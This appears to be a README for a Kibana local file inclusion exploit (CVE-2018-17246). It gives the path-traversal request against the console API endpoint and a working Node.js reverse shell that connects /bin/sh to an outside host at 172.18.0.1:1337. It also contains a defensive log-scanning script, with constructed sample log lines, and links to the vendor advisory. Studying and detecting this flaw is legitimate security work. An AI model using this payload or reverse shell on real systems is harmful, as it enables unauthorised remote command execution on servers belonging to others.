CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

A Local File Inclusion (LFI) in Kibana, found by CyberArk Labs. The LFI can be used to execute a reverse shell on the Kibana server with the following payload:

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

As you already guessed, this attack needs to be paired with an unrestricted file upload or any other vulnerability that allows you to write a file on the server.

There is no input validation, so we can change the name of the JavaScript file to anything we want. In this case, with the path traversal technique, we can choose any file on the Kibana server. One thing to be aware of, however, is Node's module caching feature. Essentially, since the LFI works by sending unsanitized user input to Node's require function, the included module (the attacker's payload) will be cached by filename. This means that you cannot send the same payload again to, e.g., recover a reverse shell.
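For defenders, the missing validation described above translates directly into a log check. The following is an added example, not code from this repository, Kibana or CyberArk: it scans access-log lines for requests to the endpoint whose `apis` value is not a plain module name. It assumes a proxy access log in common log format, that legitimate `apis` entries are comma-separated identifiers such as `es_6_0`, and all sample lines are constructed.

```javascript
// Added example, not Kibana or CyberArk code.
const ENDPOINT = "/api/console/api_server";
// Assumption: legitimate `apis` entries are plain identifiers such as "es_6_0".
const SAFE_NAME = /^[A-Za-z0-9_]+$/;

// Decode repeatedly so double-encoded separators (%252e%252e%252f) are seen.
function fullyDecode(value) {
  let current = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return every `apis` entry in a request target that is not a plain name.
function unsafeApis(requestTarget) {
  let url;
  try { url = new URL(requestTarget, "http://log.invalid"); } catch (e) { return []; }
  // endsWith tolerates a configured base path in front of the endpoint.
  if (!url.pathname.endsWith(ENDPOINT)) return [];
  const bad = [];
  for (const raw of url.searchParams.getAll("apis")) {
    for (const name of fullyDecode(raw).split(",")) {
      if (!SAFE_NAME.test(name)) bad.push(name);
    }
  }
  return bad;
}

// Scan access-log lines (assumed common log format) and report the hits.
function scanLog(lines) {
  const hits = [];
  lines.forEach((line, index) => {
    const match = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    const bad = match ? unsafeApis(match[1]) : [];
    if (bad.length > 0) hits.push({ lineNumber: index + 1, apis: bad });
  });
  return hits;
}

// Constructed sample log lines, not taken from a real server.
const SAMPLE_LOG = [
  '10.0.0.5 - - [12/Nov/2018:10:00:00 +0000] "GET /api/console/api_server?sense_version=6.4.2&apis=es_6_0 HTTP/1.1" 200 512',
  '10.0.0.9 - - [12/Nov/2018:10:00:07 +0000] "GET /api/console/api_server?sense_version=6.4.2&apis=../../../../path/to/file.js HTTP/1.1" 500 64',
  '10.0.0.9 - - [12/Nov/2018:10:00:09 +0000] "GET /api/console/api_server?apis=%252e%252e%252fpath%252fto%252ffile.js HTTP/1.1" 500 64',
  '10.0.0.5 - - [12/Nov/2018:10:00:11 +0000] "GET /app/kibana HTTP/1.1" 200 2048',
];
console.log(scanLog(SAMPLE_LOG));
```

A hit on an unpatched instance (before 6.4.3 or 5.6.13) is worth correlating with any file-write activity on the same host, since the inclusion needs a file already present on the server.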

Vulnerability details: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Security Advisory: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
